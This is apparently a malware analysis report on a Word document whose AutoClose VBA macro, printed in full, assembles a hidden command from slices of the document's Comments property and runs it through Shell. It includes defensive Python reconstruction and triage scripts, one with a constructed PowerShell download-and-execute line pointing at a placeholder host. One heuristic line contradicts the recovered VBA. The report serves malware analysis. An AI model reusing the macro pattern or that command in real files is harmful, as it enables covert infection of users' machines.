Verdict: MALICIOUS
Risk Score: 212

Malware Insights

MITRE ATT&CK
- T1059.005 Command and Scripting Interpreter: Visual Basic
- T1059.001 Command and Scripting Interpreter: PowerShell
- T1566.001 Phishing: Spearphishing Attachment
The sample is a malicious Word document carrying VBA macros. The AutoClose entry point runs when the document is closed, so a detonation that opens the file but never closes it does not trigger the payload. AutoClose calls DTOLsiGSQ, which rebuilds a command string at runtime from 52 Mid() slices of the document's Comments metadata property and hands it to VBA.Shell$ with window style 0 (vbHide, no visible window). The command text therefore never appears in the macro source itself; the SC_STR_POWERSHELL heuristic and the ClamAV name Doc.Dropper.HeuristicShellOnClose-6370606-0 indicate a hidden PowerShell launch, consistent with a dropper that downloads and executes a second-stage payload. The payload itself is not recovered in this report.
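Because the command lives in document metadata rather than in the macro body, the practical way to recover it without running the document is to emulate the handful of VBA constructs the macro uses against the extracted Comments text. The following Python is an added example for this report, not the analyzer's code: it parses `Mid(ActiveDocument.BuiltInDocumentProperties("Comments"), start, len)` assignments, resolves `+` concatenation chains through intermediate variables, and reports what reaches `Shell$`. The Comments text, the fragments inside it (a hypothetical `powershell ... iwr http://example.invalid/p ...` command) and the short macro are all constructed for illustration; the real sample's Comments property is not reproduced on this page, so the real command cannot be recovered from the page alone.

```python
"""Statically reconstruct the command a Word macro assembles from Mid()
slices of the document's Comments property, without executing the macro.

Added example, not the analyzer's code. It emulates only the constructs the
extracted macro uses: Mid(...) slice assignments, '+' concatenation of
earlier variables, and a final `VBA.Shell$ <var>, <style>`. All sample data
below is constructed.
"""
import re

MID_RE = re.compile(
    r'^\s*(\w+)\s*=\s*Mid\(ActiveDocument\.BuiltInDocumentProperties'
    r'\("Comments"\),\s*(\d+),\s*(\d+)\)\s*$', re.IGNORECASE)
CONCAT_RE = re.compile(r'^\s*(\w+)\s*=\s*(\w+(?:\s*\+\s*\w+)+)\s*$')
SHELL_RE = re.compile(r'^\s*(?:VBA\.)?Shell\$?\s+(\w+)\s*,\s*(\d+)\s*$', re.IGNORECASE)


def vba_mid(text, start, length):
    """VBA Mid(): 1-based start; a start past the end yields an empty string."""
    if start < 1 or start > len(text):
        return ""
    return text[start - 1:start - 1 + length]


def required_comments_length(macro_src):
    """Smallest Comments length for which every slice is fully populated
    (largest start + length - 1 over all Mid() calls)."""
    ends = [int(m.group(2)) + int(m.group(3)) - 1
            for m in (MID_RE.match(l) for l in macro_src.splitlines()) if m]
    return max(ends, default=0)


def reconstruct_shell_command(macro_src, comments):
    """Return (command, window_style) as Shell would receive them, or
    (None, None) when the macro has no Shell statement."""
    symbols = {}
    for line in macro_src.splitlines():
        m = MID_RE.match(line)
        if m:
            symbols[m.group(1)] = vba_mid(comments, int(m.group(2)), int(m.group(3)))
            continue
        m = CONCAT_RE.match(line)
        if m:
            parts = [p.strip() for p in m.group(2).split("+")]
            # A never-assigned Variant is Empty and contributes "" under '+'.
            symbols[m.group(1)] = "".join(symbols.get(p, "") for p in parts)
            continue
        m = SHELL_RE.match(line)
        if m:
            return symbols.get(m.group(1), ""), int(m.group(2))
    return None, None


# Constructed decoy Comments property: lure text with command fragments embedded
# at known 1-based offsets (ranges given in the trailing comments).
SAMPLE_COMMENTS = (
    "This quarterly summary was prepared for "   # 1-40    filler
    "powershell -nop -w hidden "                 # 41-66   fragment
    "review by the finance team. "               # 67-94   filler
    "-c "                                        # 95-97   fragment
    "Please do not distribute externally; "      # 98-134  filler
    "iwr http://example.invalid/p "              # 135-163 fragment
    "Contact the author with questions. "        # 164-198 filler
    "-o p.exe; "                                 # 199-208 fragment
    "Version 3 of the template was used. "       # 209-244 filler
    ".\\p.exe"                                   # 245-251 fragment
    "Do not edit."
)

# Constructed macro in the shape of the extracted one: slices read out of order,
# joined through an intermediate variable, then passed to Shell with vbHide (0).
SAMPLE_MACRO = '''
Sub DTOLsiGSQ()
    kLGVp = Mid(ActiveDocument.BuiltInDocumentProperties("Comments"), 135, 29)
    zBfEn = Mid(ActiveDocument.BuiltInDocumentProperties("Comments"), 41, 26)
    pTjDWz = Mid(ActiveDocument.BuiltInDocumentProperties("Comments"), 95, 3)
    RCbPQOWf = zBfEn + pTjDWz + kLGVp
    tGCDh = Mid(ActiveDocument.BuiltInDocumentProperties("Comments"), 199, 10)
    GlKutm = Mid(ActiveDocument.BuiltInDocumentProperties("Comments"), 245, 7)
    RnNFqMdzqF = RCbPQOWf + tGCDh + GlKutm
    VBA.Shell$ RnNFqMdzqF, 0
End Sub
Sub AutoClose()
    DTOLsiGSQ
End Sub
'''

if __name__ == "__main__":
    cmd, style = reconstruct_shell_command(SAMPLE_MACRO, SAMPLE_COMMENTS)
    print("Comments must hold at least", required_comments_length(SAMPLE_MACRO), "chars")
    print("Shell window style:", style)
    print("Reconstructed command:", cmd)
```

Applied to the macro shown later on this page, `required_comments_length()` gives 14403 (the slice at offset 14394 of length 10 reaches furthest), so the real document's Comments property must hold at least that many characters; that field is the same "Comments" entry as in the document's SummaryInformation stream, which is where an analyst would pull it from before feeding it to the reconstructor.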
Heuristics (8)

- ClamAV detection (critical, CLAMAV_DETECTION): Doc.Dropper.HeuristicShellOnClose-6370606-0. ClamAV detected this file as malware.
- VBA macros detected (medium, OLE_VBA_MACROS, 2 related findings): document contains VBA macro code.
- Potential Shell call in VBA (critical, OLE_VBA_SHELL). Matched lines in script:
  RnNFqMdzqF = umvAh + ZitGUBhrFX + rzNwlWDIj + zznHLo
  VBA.Shell$ RnNFqMdzqF, 0
  End Sub
- Auto_Close macro (low, OLE_VBA_AUTOCLOSE). Matched lines in script:
  End Sub
  Sub AutoClose()
  DTOLsiGSQ
- Reference to PowerShell (high, SC_STR_POWERSHELL). The string does not occur in the extracted macro source shown below, so the match comes from another part of the file, such as the Comments property the macro reads.
- Legacy WordBasic auto-exec macro marker (medium, OLE_LEGACY_WORDBASIC_AUTOEXEC): the OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
- Suspicious extracted artifact (info, EXTRACTED_FILE_STATIC_TRIAGE): one or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
- Embedded URL (info, EMBEDDED_URL): one or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
  URL: http://schemas.openxmlformats.org/drawingml/2006/main, found in document text (OLE body). This is the standard OOXML DrawingML namespace identifier that Office writes into its own XML parts, not a download location.
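The two findings that carry the weight here, an auto-exec entry point and a Shell call, are only dangerous together, and the report's obfuscation score rests on how many identifiers look machine-generated. The following Python is an added example (not the analyzer's own heuristics) of how such checks can be implemented over decoded VBA source: it splits the module into procedures, walks the call graph from every auto-exec name to see whether a Shell call is reachable, and scores user-defined identifiers for randomness. The thresholds in `looks_random()` and the `SAMPLE_VBA` module are constructed for illustration; the sample module mirrors the shape of the extracted macro but is not the extracted macro.

```python
"""Static triage of a VBA module: does an auto-execution entry point reach a
Shell call, and how many user-defined identifiers look machine-generated?

Added example, not the analyzer's heuristics. Thresholds and sample are
constructed for illustration.
"""
import re
from collections import deque

# Procedure names Word/Excel run without a click (case-insensitive).
AUTOEXEC_NAMES = {
    "autoopen", "auto_open", "autoclose", "auto_close", "autoexec", "autonew",
    "autoexit", "document_open", "document_close", "document_new",
    "workbook_open", "workbook_close",
}
SUB_RE = re.compile(r'^\s*(?:Public\s+|Private\s+)?(?:Sub|Function)\s+(\w+)\s*\(', re.IGNORECASE)
END_RE = re.compile(r'^\s*End\s+(?:Sub|Function)\b', re.IGNORECASE)
CALL_RE = re.compile(r'^\s*(?:Call\s+)?([A-Za-z_]\w*)\s*$')   # bare call statement
ASSIGN_RE = re.compile(r'^\s*([A-Za-z_]\w*)\s*=')              # simple assignment target
SHELL_RE = re.compile(r'\bShell\b|WScript\.Shell', re.IGNORECASE)


def split_procedures(src):
    """Map procedure name -> list of body lines."""
    procs, current = {}, None
    for line in src.splitlines():
        m = SUB_RE.match(line)
        if m:
            current = m.group(1)
            procs[current] = []
        elif END_RE.match(line):
            current = None
        elif current is not None:
            procs[current].append(line)
    return procs


def shell_paths_from_autoexec(src):
    """For each auto-exec entry point, the shortest call chain that ends in a
    procedure containing a Shell call: {entry: [entry, ..., sink]}."""
    procs = split_procedures(src)
    calls = {}
    for name, body in procs.items():
        callees = [CALL_RE.match(l).group(1) for l in body if CALL_RE.match(l)]
        calls[name] = [c for c in callees if c in procs]      # ignore keywords like Else
    has_shell = {n for n, body in procs.items() if any(SHELL_RE.search(l) for l in body)}
    paths = {}
    for entry in (n for n in procs if n.lower() in AUTOEXEC_NAMES):
        queue, seen = deque([[entry]]), {entry}
        while queue:
            path = queue.popleft()
            if path[-1] in has_shell:
                paths[entry] = path
                break
            for callee in calls[path[-1]]:
                if callee not in seen:
                    seen.add(callee)
                    queue.append(path + [callee])
    return paths


def looks_random(name):
    """Name-mangling heuristic: letter soup tends to show many lower->upper
    flips, long consonant runs, or almost no vowels. Readable camelCase
    names rarely trip all three, but this is a score, not a proof."""
    if not name.isalpha() or len(name) < 5:
        return False
    flips = sum(1 for a, b in zip(name, name[1:]) if a.islower() and b.isupper())
    vowels = sum(c in "aeiouAEIOU" for c in name)
    runs = [len(r) for r in re.findall(r'[^aeiouAEIOU]+', name)]
    return flips >= 3 or max(runs, default=0) >= 4 or vowels / len(name) < 0.25


def identifier_randomness(src):
    """(flagged, total) over procedure names and assignment targets, i.e. the
    identifiers the author chose, not the Office object model."""
    names = set()
    for line in src.splitlines():
        m = SUB_RE.match(line) or ASSIGN_RE.match(line)
        if m:
            names.add(m.group(1))
    return sum(looks_random(n) for n in names), len(names)


# Constructed module in the shape of the extracted one, plus a benign decoy Sub.
SAMPLE_VBA = '''
Attribute VB_Name = "Module1"
Sub DTOLsiGSQ()
    HnDwfUkEWs = Mid(ActiveDocument.BuiltInDocumentProperties("Comments"), 11977, 129)
    zBfEn = Mid(ActiveDocument.BuiltInDocumentProperties("Comments"), 5951, 144)
    RnNFqMdzqF = HnDwfUkEWs + zBfEn
    VBA.Shell$ RnNFqMdzqF, 0
End Sub
Sub AutoClose()
    DTOLsiGSQ
End Sub
Sub FormatReport()
    ActiveDocument.Range.Font.Size = 11
End Sub
'''

if __name__ == "__main__":
    print("auto-exec -> Shell paths:", shell_paths_from_autoexec(SAMPLE_VBA))
    print("random-looking identifiers (flagged, total):", identifier_randomness(SAMPLE_VBA))
```

The call-graph step matters more than it looks: a rule that only fires when Shell appears inside the auto-exec procedure itself misses exactly the indirection this sample uses (AutoClose contains nothing but a call to DTOLsiGSQ).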
Extracted artifacts (1)
Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 5229 bytes |

SHA-256: 239a7075559926ab49c94fe88e3e64829957026fb45bab1b5c0b32d6cc169496

Detection:
- ClamAV: no threats found (the Doc.Dropper.HeuristicShellOnClose signature above fired on the parent document, not on the decoded macro text on its own)
- Obfuscation or payload: likely. 44 of 69 identifiers look randomly generated (e.g. 'JaPabOCDnrS'), consistent with name-mangling obfuscation.

Preview script (first 1,000 lines of the extracted script; the two Attribute VB_Name lines mark the ThisDocument and Module1 modules, shown back to back):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "Module1"
Sub DTOLsiGSQ()
HnDwfUkEWs = Mid(ActiveDocument.BuiltInDocumentProperties("Comments"), 11977, 129)
zBfEn = Mid(ActiveDocument.BuiltInDocumentProperties("Comments"), 5951, 144)
AashkRSbk = Mid(ActiveDocument.BuiltInDocumentProperties("Comments"), 7648, 153)
pTjDWz = Mid(ActiveDocument.BuiltInDocumentProperties("Comments"), 12572, 63)
RanvzdFlj = Mid(ActiveDocument.BuiltInDocumentProperties("Comments"), 10593, 165)
zVufuPP = Mid(ActiveDocument.BuiltInDocumentProperties("Comments"), 6998, 53)
fNsAaLD = Mid(ActiveDocument.BuiltInDocumentProperties("Comments"), 376, 131)
wfjfFcGM = Mid(ActiveDocument.BuiltInDocumentProperties("Comments"), 1558, 60)
DfficPhpunl = Mid(ActiveDocument.BuiltInDocumentProperties("Comments"), 14147, 108)
tGCDh = Mid(ActiveDocument.BuiltInDocumentProperties("Comments"), 14058, 27)
laQLnTo = Mid(ActiveDocument.BuiltInDocumentProperties("Comments"), 10299, 115)
SZikTCn = Mid(ActiveDocument.BuiltInDocumentProperties("Comments"), 10962, 161)
QktVJBpIY = Mid(ActiveDocument.BuiltInDocumentProperties("Comments"), 3182, 6)
DYYZKJdP = Mid(ActiveDocument.BuiltInDocumentProperties("Comments"), 6796, 199)
JaPabOCDnrS = Mid(ActiveDocument.BuiltInDocumentProperties("Comments"), 9930, 118)
RCbPQOWf = HnDwfUkEWs + zBfEn + AashkRSbk + pTjDWz + RanvzdFlj + zVufuPP + fNsAaLD + wfjfFcGM + DfficPhpunl + tGCDh + laQLnTo + SZikTCn + QktVJBpIY + DYYZKJdP + JaPabOCDnrS
LtAJaKYYfk = Mid(ActiveDocument.BuiltInDocumentProperties("Comments"), 2949, 106)
dvhmmF = Mid(ActiveDocument.BuiltInDocumentProperties("Comments"), 14092, 53)
HAzHWitMAzP = Mid(ActiveDocument.BuiltInDocumentProperties("Comments"), 581, 71)
XOiNtccS = Mid(ActiveDocument.BuiltInDocumentProperties("Comments"), 5220, 64)
oKszTjbj = Mid(ActiveDocument.BuiltInDocumentProperties("Comments"), 3535, 76)
GlKutm = Mid(ActiveDocument.BuiltInDocumentProperties("Comments"), 14394, 10)
LXhVrkG = Mid(ActiveDocument.BuiltInDocumentProperties("Comments"), 1792, 12)
ZtcJcNdKwik = Mid(ActiveDocument.BuiltInDocumentProperties("Comments"), 4368, 174)
ZNoGTlDn = Mid(ActiveDocument.BuiltInDocumentProperties("Comments"), 2341, 81)
kLGVp = Mid(ActiveDocument.BuiltInDocumentProperties("Comments"), 13287, 45)
HqmkCqw = Mid(ActiveDocument.BuiltInDocumentProperties("Comments"), 13714, 118)
XjjzIHri = Mid(ActiveDocument.BuiltInDocumentProperties("Comments"), 9234, 140)
jlRUdLF = Mid(ActiveDocument.BuiltInDocumentProperties("Comments"), 8269, 162)
zVsoqdWtnt = Mid(ActiveDocument.BuiltInDocumentProperties("Comments"), 12844, 142)
qGpOWEWz = Mid(ActiveDocument.BuiltInDocumentProperties("Comments"), 13099, 14)
YWVnjpW = Mid(ActiveDocument.BuiltInDocumentProperties("Comments"), 7408, 111)
zDHCHfss = Mid(ActiveDocument.BuiltInDocumentProperties("Comments"), 8915, 72)
NDpcwpfcGH = Mid(ActiveDocument.BuiltInDocumentProperties("Comments"), 10176, 100)
pNdzVTDwh = Mid(ActiveDocument.BuiltInDocumentProperties("Comments"), 8735, 157)
UZUjDhjiL = Mid(ActiveDocument.BuiltInDocumentProperties("Comments"), 5499, 68)
PQiuYw = Mid(ActiveDocument.BuiltInDocumentProperties("Comments"), 5303, 169)
PBROOt = Mid(ActiveDocument.BuiltInDocumentProperties("Comments"), 845, 25)
JYpXEq = Mid(ActiveDocument.BuiltInDocumentProperties("Comments"), 9379, 182)
DcFbuXc = Mid(ActiveDocument.BuiltInDocumentProperties("Comments"), 6529, 158)
dzMObuEvT = Mid(ActiveDocument.BuiltInDocumentProperties("Comments"), 9622, 175)
CKFqiXZF = Mid(ActiveDocument.BuiltInDocumentProperties("Comments"), 5025, 160)
GZrNrwsZS = Mid(ActiveDocument.BuiltInDocumentProperties("Comments"), 8057, 93)
WjlvMvid = Mid(ActiveDocument.BuiltInDocumentProperties("Comments"), 7846, 44)
livSsWPz = Mid(ActiveDocument.BuiltInDocumentProperties("Comments"), 1295, 196)
WYzWYVBjwLV = Mid(ActiveDocument.BuiltInDocumentProperties("Comments"), 2824, 6)
EfbUuSb = Mid(ActiveDocument.BuiltInDocumentProperties("Comments"), 8576, 124)
mEVqvuwZ = Mid(ActiveDocument.BuiltInDocumentProperties("Comments"), 11147, 112)
vuCwjOXr = Mid(ActiveDocument.BuiltInDocumentProperties("Comments"), 13860, 124)
iYFkTrmRCUi = Mid(ActiveDocument.BuiltInDocumentProperties("Comments"), 124, 5)
umvAh = RCbPQOWf + LtAJaKYYfk + dvhmmF + HAzHWitMAzP + XOiNtccS + oKszTjbj + GlKutm + LXhVrkG + ZtcJcNdKwik + ZNoGTlDn + kLGVp + HqmkCqw + XjjzIHri + jlRUdLF + zVsoqdWtnt + qGpOWEWz + YWVnjpW + zDHCHfss + NDpcwpfcGH + pNdzVTDwh + UZUjDhjiL + PQiuYw + PBROOt + JYpXEq + DcFbuXc + dzMObuEvT + CKFqiXZF + GZrNrwsZS + WjlvMvid + livSsWPz + WYzWYVBjwLV + EfbUuSb + mEVqvuwZ + vuCwjOXr + iYFkTrmRCUi
ZitGUBhrFX = Mid(ActiveDocument.BuiltInDocumentProperties("Comments"), 4116, 7)
rzNwlWDIj = Mid(ActiveDocument.BuiltInDocumentProperties("Comments"), 45, 1)
zznHLo = Mid(ActiveDocument.BuiltInDocumentProperties("Comments"), 2466, 1)
RnNFqMdzqF = umvAh + ZitGUBhrFX + rzNwlWDIj + zznHLo
VBA.Shell$ RnNFqMdzqF, 0
End Sub
Sub AutoClose()
DTOLsiGSQ
End Sub